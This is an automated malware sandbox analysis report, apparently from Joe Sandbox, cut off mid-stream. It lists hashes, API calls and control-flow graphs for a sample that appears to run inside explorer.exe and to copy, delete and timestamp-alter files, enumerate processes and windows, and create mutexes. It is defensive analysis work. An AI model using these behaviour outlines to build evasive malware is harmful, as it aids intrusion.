                                                                                                                                • Instruction Fuzzy Hash: 17113636404206CFD715DF10AA895A8B721BB55704B14007ACE521B0C1A3BD6113970B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1994432984.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ad580f4852e8641318215a16f7c63f70c318642c86c98d9f634171b4294914d4
                                                                                                                                • Instruction ID: f3401649f1529dc56ca8e0e6371485d35b9042d0b2056da4c8f47593e1f5965b
                                                                                                                                • Opcode Fuzzy Hash: ad580f4852e8641318215a16f7c63f70c318642c86c98d9f634171b4294914d4
                                                                                                                                • Instruction Fuzzy Hash: 7701263644420ACFDB1AEF11E9896E8B732FB55704B5401BACE565B0C1E37D6113D70B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1994432984.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_oBuf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0d17a2e63e4f1915686b689582fba0273351ae16582c8cdc9572b60fe9b5c197
                                                                                                                                • Instruction ID: ab8b863e00b9434e1dbf8970a3beebb42fa128e0550c32edf730788d57ebd560
                                                                                                                                • Opcode Fuzzy Hash: 0d17a2e63e4f1915686b689582fba0273351ae16582c8cdc9572b60fe9b5c197
                                                                                                                                • Instruction Fuzzy Hash: 1001263640434ACFCB16EF11E9895E4BB32BF45708B4801A6CE565B092E3793122D70B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1994716777.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_6a0000_oBuf.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                • Instruction ID: 9670c6dc6782615957e8167651f040a8d9d68a0a5bd5790f4f5c73451d1e142f
                                                                                                                                • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                • Instruction Fuzzy Hash: 7E0184766016048FEB21EF64C804BEA33E6FF87315F4544A5D50697242E774AD418F90
                                                                                                                                APIs
                                                                                                                                • QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00418A04
                                                                                                                                • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418A1F
                                                                                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 00418A42
                                                                                                                                • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00418A51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1994456537.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_40b000_oBuf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2776817195-0
                                                                                                                                • Opcode ID: 87efacac19a89b0c53b9dbb33d5e1312a162f1387c04757d6307752c4e174176
                                                                                                                                • Instruction ID: bd9cb2cda3ccdbb603686fa1a54157cb247b1e4b5f6e470ed3bcac1d3601a900
                                                                                                                                • Opcode Fuzzy Hash: 87efacac19a89b0c53b9dbb33d5e1312a162f1387c04757d6307752c4e174176
                                                                                                                                • Instruction Fuzzy Hash: ED018474A402049BD760EB64EC55BE937B8FB1C755F00807BFA05A72D0DE746E88CB9A
                                                                                                                                APIs
                                                                                                                                • BuildCommDCBA.KERNEL32(00000000,?), ref: 00418964
                                                                                                                                • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418976
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1994456537.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_40b000_oBuf.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: BuildCommEnvironmentFreeStrings
                                                                                                                                • String ID: -
                                                                                                                                • API String ID: 2991353152-2547889144
                                                                                                                                • Opcode ID: a724ab6c00ba43ed920c74289dad73afc07e5f40d831fe2fe4a3629ab1fe5b50
                                                                                                                                • Instruction ID: b4672369b185086f5e4321c569724b1a241b362aa46ae39454cd2dcc54bfc028
                                                                                                                                • Opcode Fuzzy Hash: a724ab6c00ba43ed920c74289dad73afc07e5f40d831fe2fe4a3629ab1fe5b50
                                                                                                                                • Instruction Fuzzy Hash: 2DF0FCB18242449ADB119BA5DD807FE7B68E709330F51422EED0466240CB794EC59797

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:39.2%
                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                Signature Coverage:3.3%
                                                                                                                                Total number of Nodes:215
                                                                                                                                Total number of Limit Nodes:20
                                                                                                                                execution_graph 2624 7dc19b8 2625 7dc19c9 2624->2625 2626 7dc1952 2624->2626 2627 7dc1a03 2625->2627 2629 7dc1a10 2625->2629 2630 7dc1a60 7 API calls 2629->2630 2631 7dc1a22 2630->2631 2632 7dc1a3d 2631->2632 2633 7dc1a2b SleepEx 2631->2633 2632->2627 2633->2633 2634 7dc1a3b 2633->2634 2635 7dc2254 2 API calls 2634->2635 2636 7dc1a50 2635->2636 2637 7dc1e1c 9 API calls 2636->2637 2638 7dc1a58 2637->2638 2639 7d71971 2640 7d71972 2639->2640 2643 7d71a10 2640->2643 2644 7d71a60 11 API calls 2643->2644 2645 7d71a22 2644->2645 2646 7d71a03 2645->2646 2647 7d71a2b SleepEx 2645->2647 2647->2647 2648 7d71a3b 2647->2648 2649 7d72254 2 API calls 2648->2649 2650 7d71a50 2649->2650 2651 7d71e1c 21 API calls 2650->2651 2652 7d71a58 2651->2652 2414 7d71a10 2424 7d71a60 2414->2424 2417 7d71a3d 2418 7d71a2b SleepEx 2418->2418 2419 7d71a3b 2418->2419 2430 7d72254 2419->2430 2425 7d71a97 2424->2425 2426 7d71b60 RtlCreateHeap 2425->2426 2429 7d71a22 2425->2429 2427 7d71b91 2426->2427 2428 7d71d10 CreateThread CloseHandle CreateThread 2427->2428 2427->2429 2428->2429 2447 7d73c84 2428->2447 2455 7d73d60 2428->2455 2429->2417 2429->2418 2431 7d72272 2430->2431 2458 7d74ad0 2431->2458 2433 7d71a50 2434 7d71e1c 2433->2434 2464 7d74d20 2434->2464 2436 7d71e57 2437 7d71e88 CreateMutexExA 2436->2437 2438 7d71ea2 2437->2438 2468 7d74e90 2438->2468 2440 7d71ee1 2473 7d71f94 2440->2473 2445 7d71f4e 2485 7d722fc 2445->2485 2491 7d72d60 2445->2491 2448 7d73ca1 CreateToolhelp32Snapshot 2447->2448 2449 7d73d3b 2447->2449 2450 7d73cb5 Process32First 2448->2450 2451 7d73d23 SleepEx 2448->2451 2453 7d73ccd 2450->2453 2451->2448 2451->2449 2452 7d73d1a CloseHandle 2452->2451 2453->2452 2454 7d73d08 Process32Next 2453->2454 2454->2453 2456 7d73d96 2455->2456 2457 7d73d72 EnumWindows SleepEx 2455->2457 2457->2456 2457->2457 2459 7d74af9 2458->2459 2460 7d74b0d GetTokenInformation 2459->2460 2463 7d74b6a 2459->2463 2461 7d74b38 2460->2461 2462 7d74b42 GetTokenInformation 2461->2462 2462->2463 2463->2433 2465 7d74d4d GetVolumeInformationA 2464->2465 2467 7d74da0 2465->2467 2467->2436 2471 7d74eb2 2468->2471 2469 7d74f6e ObtainUserAgentString 2469->2440 2470 7d74ef3 RegQueryValueExA 2470->2471 2471->2470 2472 7d74f46 2471->2472 2472->2469 2475 7d71fb7 2473->2475 2474 7d71f0d CreateFileMappingA 2474->2445 2475->2474 2476 7d7201b DeleteFileW CopyFileW 2475->2476 2484 7d720ce 2475->2484 2476->2474 2477 7d7203b DeleteFileW 2476->2477 2480 7d72051 2477->2480 2479 7d720eb CreateFileW 2479->2474 2481 7d72086 DeleteFileW 2480->2481 2482 7d7209a 2481->2482 2500 7d749b0 2482->2500 2494 7d73520 2484->2494 2486 7d7232d 2485->2486 2507 7d7337c CreateFileW 2486->2507 2488 7d72342 2509 7d7239c 2488->2509 2490 7d72353 2490->2445 2492 7d7337c CreateFileW 2491->2492 2493 7d72d83 2492->2493 2493->2445 2495 7d73541 2494->2495 2496 7d73561 GetUserNameW 2495->2496 2497 7d73582 2496->2497 2505 7d73678 CoCreateInstance 2497->2505 2499 7d7359d 2499->2479 2501 7d749d7 2500->2501 2502 7d749f7 SetFileAttributesW CreateFileW 2501->2502 2503 7d74a42 SetFileTime 2502->2503 2504 7d74a63 2503->2504 2504->2484 2506 7d736d6 2505->2506 2506->2499 2508 7d733d1 2507->2508 2508->2488 2533 7d73e70 2509->2533 2511 7d72624 2512 7d7282d 2511->2512 2513 7d72648 2511->2513 2514 7d73e70 RtlReAllocateHeap 2512->2514 2515 7d726e7 2513->2515 2516 7d72789 2513->2516 2529 7d72660 2513->2529 2520 7d72854 2514->2520 2517 7d726fc DeleteFileW DeleteFileW 2515->2517 2528 7d727ec 2515->2528 2518 7d73e70 RtlReAllocateHeap 2516->2518 2519 7d7271e 2517->2519 2525 7d727b0 2518->2525 2523 7d73e70 RtlReAllocateHeap 2519->2523 2522 7d728d0 RtlReAllocateHeap 2520->2522 2520->2528 2521 7d723ef 2521->2511 2521->2528 2532 7d749b0 3 API calls 2521->2532 2522->2528 2524 7d72748 2523->2524 2530 7d72765 SleepEx RtlExitUserThread 2524->2530 2526 7d728d0 RtlReAllocateHeap 2525->2526 2525->2528 2526->2528 2527 7d73e70 RtlReAllocateHeap 2527->2529 2528->2490 2529->2515 2529->2527 2529->2528 2537 7d728d0 2529->2537 2530->2528 2532->2511 2534 7d73e9f 2533->2534 2543 7d7400c 2534->2543 2536 7d73fbf 2536->2521 2538 7d728d9 2537->2538 2540 7d72cf3 2537->2540 2539 7d7400c RtlReAllocateHeap 2538->2539 2542 7d729d8 2538->2542 2539->2542 2540->2529 2541 7d73e70 RtlReAllocateHeap 2541->2540 2542->2540 2542->2541 2544 7d74056 2543->2544 2545 7d7404f 2543->2545 2544->2545 2546 7d7433f RtlReAllocateHeap 2544->2546 2545->2536 2546->2544 2653 7dc17fb 2654 7dc1827 2653->2654 2655 7dc1901 2654->2655 2656 7dc1a10 19 API calls 2654->2656 2657 7dc1a03 2656->2657 2547 7dc1a10 2557 7dc1a60 2547->2557 2550 7dc1a3d 2551 7dc1a2b SleepEx 2551->2551 2552 7dc1a3b 2551->2552 2564 7dc2254 2552->2564 2558 7dc1a97 2557->2558 2559 7dc1b60 RtlCreateHeap 2558->2559 2563 7dc1a22 2558->2563 2560 7dc1b91 2559->2560 2561 7dc1d10 CreateThread 2560->2561 2560->2563 2562 7dc1d41 CreateThread 2561->2562 2584 7dc3c84 2561->2584 2562->2563 2581 7dc3d60 2562->2581 2563->2550 2563->2551 2565 7dc2272 2564->2565 2589 7dc4ad0 2565->2589 2567 7dc1a50 2568 7dc1e1c 2567->2568 2595 7dc4d20 2568->2595 2570 7dc1e57 2571 7dc1e88 CreateMutexExA 2570->2571 2572 7dc1ea2 2571->2572 2599 7dc4e90 2572->2599 2574 7dc1ee1 2603 7dc1f94 2574->2603 2579 7dc1f4e 2607 7dc22fc 2579->2607 2613 7dc2d60 2579->2613 2582 7dc3d96 2581->2582 2583 7dc3d72 EnumWindows SleepEx 2581->2583 2583->2582 2583->2583 2585 7dc3d3b 2584->2585 2586 7dc3ca1 CreateToolhelp32Snapshot 2584->2586 2587 7dc3d23 SleepEx 2586->2587 2588 7dc3cb5 2586->2588 2587->2585 2587->2586 2588->2587 2590 7dc4af9 2589->2590 2591 7dc4b0d GetTokenInformation 2590->2591 2594 7dc4b6a 2590->2594 2592 7dc4b38 2591->2592 2593 7dc4b42 GetTokenInformation 2592->2593 2593->2594 2594->2567 2596 7dc4d4d GetVolumeInformationA 2595->2596 2598 7dc4da0 2596->2598 2598->2570 2602 7dc4eb2 2599->2602 2600 7dc4ef3 RegQueryValueExA 2600->2602 2601 7dc4f46 2601->2574 2602->2600 2602->2601 2606 7dc1fb7 2603->2606 2604 7dc1f0d CreateFileMappingA 2604->2579 2605 7dc20eb CreateFileW 2605->2604 2606->2604 2606->2605 2608 7dc232d 2607->2608 2616 7dc337c CreateFileW 2608->2616 2610 7dc2342 2618 7dc239c 2610->2618 2612 7dc2353 2612->2579 2614 7dc337c CreateFileW 2613->2614 2615 7dc2d83 2614->2615 2615->2579 2617 7dc33d1 2616->2617 2617->2610 2620 7dc23ef 2618->2620 2619 7dc2789 2619->2612 2620->2619 2621 7dc26fc DeleteFileW DeleteFileW 2620->2621 2622 7dc271e 2621->2622 2623 7dc2777 RtlExitUserThread 2622->2623 2623->2619 2658 7d717fb 2659 7d71827 2658->2659 2660 7d71901 2659->2660 2661 7d71a10 35 API calls 2659->2661 2662 7d71a03 2661->2662 2663 7dc1971 2664 7dc1972 2663->2664 2665 7dc1a10 19 API calls 2664->2665 2666 7dc1a03 2665->2666 2667 7d719b8 2668 7d71952 2667->2668 2669 7d719c9 2667->2669 2670 7d71a03 2669->2670 2671 7d71a10 35 API calls 2669->2671 2671->2670
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.2949612215.0000000007D71000.00000020.80000000.00040000.00000000.sdmp, Offset: 07D71000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_7d71000_explorer.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateInstance
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 542301482-0
                                                                                                                                • Opcode ID: b35aeaa2dabb4e76190c9dece0e8e20c87b044d0080395537af34a5cdc12a271
                                                                                                                                • Instruction ID: 2f2de06324dbf976ecbe6bc0a3cf3fc0eef26bcc0f77a365488642f85e5d73f5
                                                                                                                                • Opcode Fuzzy Hash: b35aeaa2dabb4e76190c9dece0e8e20c87b044d0080395537af34a5cdc12a271
                                                                                                                                • Instruction Fuzzy Hash: DDE1EA34608A4CCFCB94EF28C895E99B7F1FFA9305F114699E44ACB265DB70E944CB41
                                                                                                                                APIs
                                                                                                                                • GetUserNameW.ADVAPI32 ref: 07D73574
                                                                                                                                  • Part of subcall function 07D73678: CoCreateInstance.COMBASE ref: 07D736C5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.2949612215.0000000007D71000.00000020.80000000.00040000.00000000.sdmp, Offset: 07D71000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_7d71000_explorer.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateInstanceNameUser
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3213660374-0
                                                                                                                                • Opcode ID: fd6447a474a0c6c4e583e87f53b4852dd761150ae4ae7b776ee82d00e2f1a7d0
                                                                                                                                • Instruction ID: ba5d03e2bf8d134db9e5e1bb67875f6280ab051b42476437b8236d12714de5f6
                                                                                                                                • Opcode Fuzzy Hash: fd6447a474a0c6c4e583e87f53b4852dd761150ae4ae7b776ee82d00e2f1a7d0
                                                                                                                                • Instruction Fuzzy Hash: 72110A70718B4C8FDB90EF68905875EB6D2EBDC310F500A6E984EC3255EA7499448792

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 0 7d7239c-7d723f9 call 7d73e70 3 7d728a7 0->3 4 7d723ff-7d72404 0->4 6 7d728ad-7d728c7 3->6 4->3 5 7d7240a-7d7240d 4->5 5->3 7 7d72413-7d7241e 5->7 8 7d72897-7d728a5 call 7d753d8 7->8 9 7d72424-7d72457 call 7d75058 7->9 8->3 8->6 9->8 15 7d7245d-7d72482 call 7d74fac call 7d7516c 9->15 20 7d72484-7d7249e 15->20 21 7d724ad 15->21 20->21 25 7d724a0-7d724ab 20->25 22 7d724b2-7d724cb call 7d7516c 21->22 27 7d724d1-7d724e4 22->27 28 7d7263a-7d72642 22->28 25->22 29 7d72536-7d72538 27->29 30 7d724e6-7d7252d 27->30 31 7d7282d-7d7285a call 7d73e70 28->31 32 7d72648-7d7264c 28->32 29->28 33 7d7253e-7d725b0 call 7d753f8 29->33 30->29 46 7d7288f-7d72895 31->46 47 7d7285c-7d72863 31->47 35 7d726f4-7d72784 call 7d74730 DeleteFileW * 2 call 7d734d4 call 7d73e70 call 7d753d8 SleepEx RtlExitUserThread 32->35 36 7d72652-7d7265a 32->36 80 7d725b2-7d7262a call 7d74fac call 7d75058 call 7d749b0 call 7d7535c 33->80 81 7d7262f-7d72635 call 7d753d8 33->81 35->8 41 7d72660-7d7266d 36->41 42 7d72789-7d727b6 call 7d73e70 36->42 41->46 54 7d72673-7d72676 41->54 42->46 57 7d727bc-7d727c3 42->57 46->8 47->46 48 7d72865-7d72868 47->48 48->46 53 7d7286a-7d7288a call 7d728d0 call 7d753d8 48->53 53->46 54->46 60 7d7267c-7d72680 54->60 57->46 62 7d727c9-7d727cc 57->62 64 7d726e7-7d726ee 60->64 65 7d72682-7d726af call 7d73e70 60->65 62->46 68 7d727d2-7d7282b call 7d728d0 call 7d74730 call 7d753d8 62->68 64->35 64->46 78 7d726e1-7d726e5 65->78 79 7d726b1-7d726b8 65->79 68->46 78->64 78->65 79->78 83 7d726ba-7d726bd 79->83 80->81 81->28 83->78 88 7d726bf-7d726dc call 7d728d0 call 7d753d8 83->88 88->78
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.2949612215.0000000007D71000.00000020.80000000.00040000.00000000.sdmp, Offset: 07D71000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_7d71000_explorer.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: DeleteFile$ExitSleepThreadUser
                                                                                                                                • String ID: |:|
                                                                                                                                • API String ID: 2796381497-3736120136
                                                                                                                                • Opcode ID: fbb803279be7c0de3d631b165653baee0dbf7d5d4714adb9b6c3d05972f478bd
                                                                                                                                • Instruction ID: f4d095280e1e0f9e9f92ed9351731af337569706a0d63000f38376442970d8b7
                                                                                                                                • Opcode Fuzzy Hash: fbb803279be7c0de3d631b165653baee0dbf7d5d4714adb9b6c3d05972f478bd
                                                                                                                                • Instruction Fuzzy Hash: A6E1C8B0718F898BD719AB2894597BEB6E1FB98311F10062ED49FC3240EF74E941C786

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 105 7d71a60-7d71a95 106 7d71a97-7d71a9e 105->106 107 7d71ab3-7d71ab7 106->107 108 7d71aa0-7d71ab1 107->108 109 7d71ab9-7d71ac5 107->109 108->107 110 7d71ac7-7d71acd 109->110 111 7d71adc-7d71ae1 109->111 112 7d71ae7-7d71aee 110->112 113 7d71acf-7d71ada 110->113 111->112 114 7d71af0-7d71af7 112->114 115 7d71af9-7d71aff 112->115 113->112 114->115 116 7d71b01-7d71b0b 114->116 115->106 115->116 117 7d71b0d-7d71b14 116->117 118 7d71b1a-7d71b32 call 7d71d98 116->118 117->118 119 7d71d6f 117->119 118->119 123 7d71b38-7d71b5a call 7d71d98 118->123 122 7d71d71-7d71d8f 119->122 123->119 126 7d71b60-7d71b8f RtlCreateHeap 123->126 127 7d71b91-7d71bab call 7d74fac 126->127 127->119 131 7d71bb1-7d71bc9 call 7d7535c 127->131 131->127 134 7d71bcb-7d71be6 call 7d71d98 131->134 134->119 137 7d71bec-7d71c0b call 7d71d98 134->137 137->119 140 7d71c11-7d71c30 call 7d71d98 137->140 140->119 143 7d71c36-7d71c55 call 7d71d98 140->143 143->119 146 7d71c5b-7d71c7a call 7d71d98 143->146 146->119 149 7d71c80-7d71c9f call 7d71d98 146->149 149->119 152 7d71ca5-7d71d00 call 7d74bac * 3 149->152 152->119 159 7d71d02-7d71d09 152->159 159->119 160 7d71d0b-7d71d0e 159->160 160->119 161 7d71d10-7d71d60 CreateThread CloseHandle CreateThread 160->161 162 7d71d68-7d71d6d 161->162 162->122
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.2949612215.0000000007D71000.00000020.80000000.00040000.00000000.sdmp, Offset: 07D71000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_7d71000_explorer.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Create$Thread$CloseHandleHeap
                                                                                                                                • String ID: iP+
                                                                                                                                • API String ID: 371905858-51890417
                                                                                                                                • Opcode ID: 2cb0cc4895ba9d61a021ba4609a68b07abc7c0267e95d8eab074489c4e5da047
                                                                                                                                • Instruction ID: 9108c63ab14ddae316afdcfa9ccabfbab73759bb6314c0549827bfdec41d8049
                                                                                                                                • Opcode Fuzzy Hash: 2cb0cc4895ba9d61a021ba4609a68b07abc7c0267e95d8eab074489c4e5da047
                                                                                                                                • Instruction Fuzzy Hash: 699181B0618E098FDF54EF2898D2AA5B3D6FBD8300F4802799C4ECB156EA35D541CB96

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • DeleteFileW.KERNEL32 ref: 07D7201E
                                                                                                                                • CopyFileW.KERNEL32 ref: 07D7202D
                                                                                                                                • DeleteFileW.KERNEL32 ref: 07D7203E
                                                                                                                                • DeleteFileW.KERNEL32 ref: 07D72089
                                                                                                                                  • Part of subcall function 07D749B0: SetFileAttributesW.KERNEL32 ref: 07D749FF
                                                                                                                                  • Part of subcall function 07D749B0: CreateFileW.KERNEL32 ref: 07D74A29
                                                                                                                                  • Part of subcall function 07D749B0: SetFileTime.KERNEL32 ref: 07D74A54
                                                                                                                                • CreateFileW.KERNEL32 ref: 07D72115
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.2949612215.0000000007D71000.00000020.80000000.00040000.00000000.sdmp, Offset: 07D71000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_7d71000_explorer.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: File$Delete$Create$AttributesCopyTime
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 642576546-0
                                                                                                                                • Opcode ID: 11cbd7d4e9e3daf7bdfec7693b32ce184b43af76b4895d117b786d6ffa4ff202
                                                                                                                                • Instruction ID: f74b3ebc4233418b0c8c832d444776742125a3e8ccfd450c7d83102986b29749
                                                                                                                                • Opcode Fuzzy Hash: 11cbd7d4e9e3daf7bdfec7693b32ce184b43af76b4895d117b786d6ffa4ff202
                                                                                                                                • Instruction Fuzzy Hash: 82414F70718A4C8FDB98AF6C945836DB5D2EBC8311F14417EA80FC3395EE349D0587A6

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 202 7d73c84-7d73c9b 203 7d73ca1-7d73cb3 CreateToolhelp32Snapshot 202->203 204 7d73d3b-7d73d54 202->204 205 7d73cb5-7d73ccb Process32First 203->205 206 7d73d23-7d73d35 SleepEx 203->206 207 7d73d16-7d73d18 205->207 206->203 206->204 208 7d73ccd-7d73ce4 call 7d75140 207->208 209 7d73d1a-7d73d1d CloseHandle 207->209 212 7d73ce6-7d73ce8 208->212 209->206 213 7d73cfc-7d73d03 call 7d747a4 212->213 214 7d73cea-7d73cf8 212->214 217 7d73d08-7d73d10 Process32Next 213->217 214->212 215 7d73cfa 214->215 215->217 217->207
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.2949612215.0000000007D71000.00000020.80000000.00040000.00000000.sdmp, Offset: 07D71000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_7d71000_explorer.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2482764027-0
                                                                                                                                • Opcode ID: d87648c068091f5a601a251f696ac908138681014b07281b27555691989c57a1
                                                                                                                                • Instruction ID: 36ff02de1785e75355e2d72738e4849a13ba399480e7295a6240a6bb397c3404
                                                                                                                                • Opcode Fuzzy Hash: d87648c068091f5a601a251f696ac908138681014b07281b27555691989c57a1
                                                                                                                                • Instruction Fuzzy Hash: EA210370218A498FDB18EF64C0887AAB2E2FF88315F080B7ED84FDE185EB348545D721

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 218 7dc239c-7dc23f9 call 7dc3e70 221 7dc23ff-7dc2404 218->221 222 7dc28a7 218->222 221->222 224 7dc240a-7dc240d 221->224 223 7dc28ad-7dc28c7 222->223 224->222 225 7dc2413-7dc241e 224->225 226 7dc2424-7dc2457 call 7dc5058 225->226 227 7dc2897-7dc28a5 call 7dc53d8 225->227 226->227 233 7dc245d-7dc2482 call 7dc4fac call 7dc516c 226->233 227->222 227->223 238 7dc24ad 233->238 239 7dc2484-7dc249e 233->239 240 7dc24b2-7dc24cb call 7dc516c 238->240 239->238 243 7dc24a0-7dc24ab 239->243 245 7dc263a-7dc2642 240->245 246 7dc24d1-7dc24e4 240->246 243->240 247 7dc282d-7dc285a call 7dc3e70 245->247 248 7dc2648-7dc264c 245->248 249 7dc2536-7dc2538 246->249 250 7dc24e6-7dc252d 246->250 263 7dc285c-7dc2863 247->263 264 7dc288f-7dc2895 247->264 251 7dc26f4-7dc2784 call 7dc4730 DeleteFileW * 2 call 7dc34d4 call 7dc3e70 call 7dc53d8 RtlExitUserThread 248->251 252 7dc2652-7dc265a 248->252 249->245 254 7dc253e-7dc25b0 call 7dc53f8 249->254 250->249 251->227 256 7dc2789-7dc27b6 call 7dc3e70 252->256 257 7dc2660-7dc266d 252->257 295 7dc262f-7dc2635 call 7dc53d8 254->295 296 7dc25b2-7dc262a call 7dc4fac call 7dc5058 call 7dc49b0 call 7dc535c 254->296 256->264 271 7dc27bc-7dc27c3 256->271 257->264 272 7dc2673-7dc2676 257->272 263->264 270 7dc2865-7dc2868 263->270 264->227 270->264 274 7dc286a-7dc288a call 7dc28d0 call 7dc53d8 270->274 271->264 277 7dc27c9-7dc27cc 271->277 272->264 278 7dc267c-7dc2680 272->278 274->264 277->264 281 7dc27d2-7dc282b call 7dc28d0 call 7dc4730 call 7dc53d8 277->281 282 7dc26e7-7dc26ee 278->282 283 7dc2682-7dc26af call 7dc3e70 278->283 281->264 282->251 282->264 298 7dc26e1-7dc26e5 283->298 299 7dc26b1-7dc26b8 283->299 295->245 296->295 298->282 298->283 299->298 302 7dc26ba-7dc26bd 299->302 302->298 307 7dc26bf-7dc26dc call 7dc28d0 call 7dc53d8 302->307 307->298
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.2949689441.0000000007DC1000.00000020.80000000.00040000.00000000.sdmp, Offset: 07DC1000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_7dc1000_explorer.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: DeleteFile$ExitThreadUser
                                                                                                                                • String ID: |:|
                                                                                                                                • API String ID: 3702773391-3736120136
                                                                                                                                • Opcode ID: fbb803279be7c0de3d631b165653baee0dbf7d5d4714adb9b6c3d05972f478bd
                                                                                                                                • Instruction ID: 5a9e2dd6bcfd190bf2078565cb1282250e63ae71f5319c0a2c65f35884b94932
                                                                                                                                • Opcode Fuzzy Hash: fbb803279be7c0de3d631b165653baee0dbf7d5d4714adb9b6c3d05972f478bd
                                                                                                                                • Instruction Fuzzy Hash: 06E1B4B0718F4A8BDB19EB6894583BAB6D1FF98311F10062ED49FC3240DF74E9428796

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
